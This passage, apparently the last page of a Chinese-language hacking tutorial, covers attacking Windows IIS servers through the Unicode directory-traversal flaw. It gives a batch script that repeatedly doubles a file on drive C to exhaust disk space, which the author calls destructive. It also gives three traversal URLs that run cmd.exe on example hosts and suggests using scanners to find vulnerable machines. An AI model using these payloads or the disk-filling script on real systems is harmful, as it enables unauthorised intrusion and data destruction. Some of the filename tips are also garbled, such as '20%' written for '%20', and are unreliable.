四，细节问题。 

1，遇到长文件名怎么办？ 

c:\program files\ 

就用c:\"program20%files"\ 

2，遇到空格怎么办？ 

20%代替喽，或者xx yy=xxyy~1 

3,如何做个很大的文件？ 

目的就是破坏啦！我不喜欢不过教教你们啦 

@echo off 

echo big > c:\a.a 

:h 

copy c:\a.a+c:\a.a c:\a.a 

goto h 

注意不要乱来啊！ 

4，输入命令，没反应或反应不对。 

：）请检查检查再检查命令的正确性，可能没有漏洞，那就闪人！ 看在你看到这里那么给我面子的份上，在给你几个吧！ 

http://www.exsample.com/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 或http://www.exsample.com/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 或http://www.exsample.com/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 

不一定有用哦！ 

5，如何找到unicode漏洞的主机 

呵呵：）最好的方法自然是………………一个一个ping,一个一个试喽：） 不要打我呀！我说我说。最好找一个cgi扫描器，unicode查找器多如牛毛，随便找个吧！

上一页  [1] [2] [3]